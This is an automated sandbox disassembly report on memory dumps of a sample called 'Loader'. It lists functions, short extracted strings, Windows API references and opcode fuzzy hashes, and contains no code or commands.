Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: *XJ{$>T\Z$])$aff{
API String ID: 0-2222276473
Opcode ID: 8ed444fac277c25db64a3c47ba10bfddbb1231e036786dedd629cc3a06cf1c87
Instruction ID: d33965fedcf3ec8bfaea6ee49b2b1930116d66db9d4f17549310b4a685dd9ed8
Opcode Fuzzy Hash: 8ed444fac277c25db64a3c47ba10bfddbb1231e036786dedd629cc3a06cf1c87
Instruction Fuzzy Hash: 2952E570604F818FD725CF36C4507A7BBE1AF96314F188A6DC4EB8B686C778A506CB61

Function 001BF437 Relevance: 5.5, Strings: 4, Instructions: 487COMMON

Download Yara Rule

Strings

gfff, xrefs: 001BFE7B
gfff, xrefs: 001BFF36
-, xrefs: 001BFE1E
gfff, xrefs: 001BFEEB

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: -$gfff$gfff$gfff
API String ID: 0-3742897846
Opcode ID: 8cb0c85ab2aa89b0f8fbe9e11dafeed8b6e90a114adba7170f24e27e5439f530
Instruction ID: 923f8d1e0d1fdb5aa2454058e77b70494cb0962b000f6e2f2ffbdacab0c5a947
Opcode Fuzzy Hash: 8cb0c85ab2aa89b0f8fbe9e11dafeed8b6e90a114adba7170f24e27e5439f530
Instruction Fuzzy Hash: B60290716097518FD718CE29C8907AABBE2AFD9304F08892DF4D9CB392D734D945CB92

Function 00191CD2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00193272: __EH_prolog3_catch.LIBCMT ref: 00193279

_Deallocate.LIBCONCRT ref: 00191EAD
_Deallocate.LIBCONCRT ref: 00191EFA

Strings

Current val: %d, xrefs: 00191E86

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: Deallocate$H_prolog3_catch
String ID: Current val: %d
API String ID: 1212816977-1825967858
Opcode ID: a424b2a6da356b597d4bd61dfcba192187442aaaec6ea158ec1f9ce625af762b
Instruction ID: 3b5c54654b036e63f4fcd303ac846253f5ecae6d34260f7ff8eb6a838d6f613a
Opcode Fuzzy Hash: a424b2a6da356b597d4bd61dfcba192187442aaaec6ea158ec1f9ce625af762b
Instruction Fuzzy Hash: 4A61CC7251C3429FC721DF69D48026BFBE0AFD9724F140A2DF9D493242D735E9448B92

Function 001EE020 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

Ncq, xrefs: 001EE203
7()&, xrefs: 001EE16D
mYZ, xrefs: 001EE04B
*&?$, xrefs: 001EE177

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: *&?$$7()&$mYZ$Ncq
API String ID: 0-3297506359
Opcode ID: e5dd2e3e2cd6302b14accdbc0867204686c8f3655a5c5960ca38aa80a062f07d
Instruction ID: e8574adfe82d45d3babbcaef20d4f19ffed0c0d61f3b8f6cef08f9231ef99dae
Opcode Fuzzy Hash: e5dd2e3e2cd6302b14accdbc0867204686c8f3655a5c5960ca38aa80a062f07d
Instruction Fuzzy Hash: A181D5B4508B818BD325CF36C4907A7BBE1EF52304F18896CD4EF4B685D7396409CB55

Function 001AC783 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001AC7D7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001AC821
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001AC8E7

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: f7af301647b52cdd3b4636152729d3622d34a0591f41ed671cac154c22cf7117
Instruction ID: f737d61dfa56b9b0119d605013d803e79a1ad615db14e54e711059b1453f236d
Opcode Fuzzy Hash: f7af301647b52cdd3b4636152729d3622d34a0591f41ed671cac154c22cf7117
Instruction Fuzzy Hash: 3561C1795002079FEF289F28CC82BBAB3A9FF16314F10417AE905C6585EB38DD81DB90

Function 0019D1AF Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0019D2A7
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0019D2B1
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0019D2BE

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 725576ab1f7cc9aac2ebd3c0aa346e6ea11bc7386be812e8909c0894c880f6b7
Instruction ID: 72f2f4171ee0f2803015f74977448291bcd196aa8693a3ee81c56e696e3c942b
Opcode Fuzzy Hash: 725576ab1f7cc9aac2ebd3c0aa346e6ea11bc7386be812e8909c0894c880f6b7
Instruction Fuzzy Hash: 6731C574911218ABCF21DF68D9897CDBBB8BF18310F5041EAE41CA7290EB709F858F44

Function 001BF502 Relevance: 4.2, Strings: 3, Instructions: 473COMMON

Download Yara Rule

Strings

gfff, xrefs: 001BFC5C
gfff, xrefs: 001BFC3B
+, xrefs: 001BF42B

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: +$gfff$gfff
API String ID: 0-3646763964
Opcode ID: 3ffc56beea234f1ab54261763397f98ef3f6dd92bbd47de999464188f86deefc
Instruction ID: e65a06cbc154e2811577ed8748148fa7f0c698b4f1253677319b0e8a8d446a28
Opcode Fuzzy Hash: 3ffc56beea234f1ab54261763397f98ef3f6dd92bbd47de999464188f86deefc
Instruction Fuzzy Hash: 8202807160C3918FC719CF29C49066AFBE2AFD9304F188A6DE8D987352D335D946CB92

Function 001E1410 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

Yber, xrefs: 001E15F4
NPFN, xrefs: 001E154C
w, xrefs: 001E18BF

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: NPFN$Yber$w
API String ID: 0-2009834778
Opcode ID: cac9b1dd26bfeec110c7d6f1e08a87e9c7bbbee78f555d126f6bfc88f6fe250c
Instruction ID: cc71377278bbe94659da5a0bf6e5233a8df5dea9530c31499aebcff3a64f08c3
Opcode Fuzzy Hash: cac9b1dd26bfeec110c7d6f1e08a87e9c7bbbee78f555d126f6bfc88f6fe250c
Instruction Fuzzy Hash: 21E101B1A08340ABD314DF25D882BAFBBE5AFE5704F08892DF58993242D774D9098793

Function 001BF24E Relevance: 4.1, Strings: 3, Instructions: 372COMMON

Download Yara Rule

Strings

gfff, xrefs: 001BFC5C
gfff, xrefs: 001BFC3B
-, xrefs: 001BFC1F

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: -$gfff$gfff
API String ID: 0-837351935
Opcode ID: 2b246fee1e96ab77cbfea3b02b5951998acea595ba4b8d542442ccafe6eddf1f
Instruction ID: 0d6469e7f3558ec0a1afa8767c5f886d104c6ae322f0946e7eb09595f68809a9
Opcode Fuzzy Hash: 2b246fee1e96ab77cbfea3b02b5951998acea595ba4b8d542442ccafe6eddf1f
Instruction Fuzzy Hash: C4D1AE7560C3918FC719CF28C49066AFBE1AFE9304F188A6DE8D987352D335D949CB92

Function 001CB7C0 Relevance: 4.1, Strings: 3, Instructions: 358COMMON

Download Yara Rule

Strings

D, xrefs: 001CB99B
pq, xrefs: 001CBC39
T, xrefs: 001CB832

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: D$T$pq
API String ID: 0-1650208392
Opcode ID: 179ced83c93506f93868ebb32039e1a034d70eca660c4b6b59c32d5282ddd536
Instruction ID: b834e28bc26262ee4220b59ae42cd460afc09c9fd3a5806d5e6b64393f1cc3d6
Opcode Fuzzy Hash: 179ced83c93506f93868ebb32039e1a034d70eca660c4b6b59c32d5282ddd536
Instruction Fuzzy Hash: 93C1BBB160C3848FE710DF25D881B5BBBE6EBD1314F18882CE1C49B352DB35C90A8B96

Function 001CB3D0 Relevance: 4.1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

+ 47, xrefs: 001CB6F4
'|H, xrefs: 001CB589
., xrefs: 001CB56E

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: + 47$.$'|H
API String ID: 0-109567950
Opcode ID: 54ebea9f41e9dbb84324b087273c464a07e3396ba849ab18214a3e9178a1a45c
Instruction ID: c0dd302c5e0655953556dd9a0b584eb9c724fb80c248a436ee8770e4a7b11971
Opcode Fuzzy Hash: 54ebea9f41e9dbb84324b087273c464a07e3396ba849ab18214a3e9178a1a45c
Instruction Fuzzy Hash: 80A1F47151C7918FD3158F29C49075BBFE1AFA6314F18896CE8D59B382C779C809CB92

Function 001EEFD9 Relevance: 4.0, Strings: 3, Instructions: 266COMMON

Download Yara Rule

Strings

.L6l, xrefs: 001EF21E
dxT3, xrefs: 001EF228
;/*, xrefs: 001EF06B

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: ;/*$.L6l$dxT3
API String ID: 0-2401999623
Opcode ID: 9e77fbb4471a8027105352b42f26c5cf2fd319c44dc2b268aa6f88fe23aaabc7
Instruction ID: 147e4e8f35a77888777b2d35e6cbebca71966094bec69298d73f4feeb9107ef1
Opcode Fuzzy Hash: 9e77fbb4471a8027105352b42f26c5cf2fd319c44dc2b268aa6f88fe23aaabc7
Instruction Fuzzy Hash: 8391E474604B808FE335CB3AC4657A7BBE1AF53304F18896DD5EB8B282D779A406CB51

Function 0019FB00 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71130d6100ede6563424b8a4d7df45df7381647f619140e561abbae099e1f578
Instruction ID: 9bb88926932e37ee5298ec822c8a03e81cf0354fa835d4e57c915f1c202aec9b
Opcode Fuzzy Hash: 71130d6100ede6563424b8a4d7df45df7381647f619140e561abbae099e1f578
Instruction Fuzzy Hash: F1F10D71E00219AFDF14CFA9C890AADB7B1EF49314F15826DE915EB391D730AD468B90

Function 001E0B00 Relevance: 3.1, Strings: 2, Instructions: 593COMMON

Download Yara Rule

Strings

%*+(, xrefs: 001E0C6B, 001E0C7D
%*+(, xrefs: 001E0CB4

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+($%*+(
API String ID: 0-3039692684
Opcode ID: c0c64b1f1a311242f5653ae87034764490023d811ee37297f05c80f2601e4e2f
Instruction ID: abc95666b1901b47be3c5f48afddc7401bfb4d2451ae86c7b510c8baeead6f71
Opcode Fuzzy Hash: c0c64b1f1a311242f5653ae87034764490023d811ee37297f05c80f2601e4e2f
Instruction Fuzzy Hash: CE12BD702087819BE735CF56DC41BAFB7E2FBC8740F14892CE6899B291E771A841CB52

Function 001FEFE0 Relevance: 3.1, Strings: 2, Instructions: 565COMMON

Download Yara Rule

Strings

f, xrefs: 001FF1C2
%*+(, xrefs: 001FF067

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+($f
API String ID: 0-2038831151
Opcode ID: 110a5ef49e9f0dda32428eb62bfb9db942ad63d1b2837951dfcae4362f03bc3c
Instruction ID: 1d6bfc6699a115915b5536241987ab9266bc7a2dd65c1c564a910233cf596411
Opcode Fuzzy Hash: 110a5ef49e9f0dda32428eb62bfb9db942ad63d1b2837951dfcae4362f03bc3c
Instruction Fuzzy Hash: 0412AC716083459FC714CF18C890A2BBBE2BFC5314F188A2DF6958B3A2D7B5D946CB52

Function 001C6220 Relevance: 2.9, Strings: 2, Instructions: 392COMMON

Download Yara Rule

Strings

IEND, xrefs: 001C6683
), xrefs: 001C629D

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 60aa286231864026a4360cbbcdb69e3dea2ab465c2c993e02c08dd386b771a1a
Instruction ID: 0fb19903763300635933adc036978006a7c4f19c75341b440ee09df31da8f851
Opcode Fuzzy Hash: 60aa286231864026a4360cbbcdb69e3dea2ab465c2c993e02c08dd386b771a1a
Instruction Fuzzy Hash: CDE1D071A087519FE310CF28C885B1AFBE0BFA4318F15492DE9999B382D775E815CBD2

Function 001F02BA Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

gav`, xrefs: 001F05F1
_lnu, xrefs: 001F02DC

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: _lnu$gav`
API String ID: 0-2746408054
Opcode ID: 596df4c367a22ad9e4bb932596eb35b049ddd14699b744f4d00e616af24bd3fa
Instruction ID: 8d84986b69dcabfb9ee5ef4d91c1787ae80dd95795058843ca50a1b2a4abe712
Opcode Fuzzy Hash: 596df4c367a22ad9e4bb932596eb35b049ddd14699b744f4d00e616af24bd3fa
Instruction Fuzzy Hash: CBA1E470604B818FE32ACF39C4607B3BBE1AF96305F18895DC1EB8B392D77565098B55

Function 001DFFF7 Relevance: 2.8, Strings: 2, Instructions: 263COMMON

Download Yara Rule

Strings

8&, xrefs: 001E00B2
TU, xrefs: 001E01F2

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: 8&$TU
API String ID: 0-697040407
Opcode ID: 87772b0907a8c6011020926a42aeafa4a3dfce88e1875cc1dd4270d8d4d27a2c
Instruction ID: 9324d3e60b6a8bbdf1013a7308e670c93f152f632742e0b8a0592e3bd5a1fb84
Opcode Fuzzy Hash: 87772b0907a8c6011020926a42aeafa4a3dfce88e1875cc1dd4270d8d4d27a2c
Instruction Fuzzy Hash: 1A71DEB05087418BC715CF69C8A276BB7F0EFA9364F18991CE4D58B391E3B4C985CB92

Function 001EBFD7 Relevance: 2.7, Strings: 2, Instructions: 247COMMON

Download Yara Rule

Strings

P7T), xrefs: 001EC08C
(+, xrefs: 001EC094

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: (+$P7T)
API String ID: 0-1314400319
Opcode ID: b67460535bc2a92cba6805e8989cc5b43a352196e4157dfd4920d87d7efd6eb8
Instruction ID: 9d29231831988a6284df1494e95cf0fbe608c4b44baee50e8891db04dff778fa
Opcode Fuzzy Hash: b67460535bc2a92cba6805e8989cc5b43a352196e4157dfd4920d87d7efd6eb8
Instruction Fuzzy Hash: 78610DB0508791CBC724CF15D8A176BB7F0EF92724F089E1CE8E58B291E3788945CB92

Function 001EB430 Relevance: 2.7, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

U123, xrefs: 001EB55B, 001EB55F
['e!, xrefs: 001EB485

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
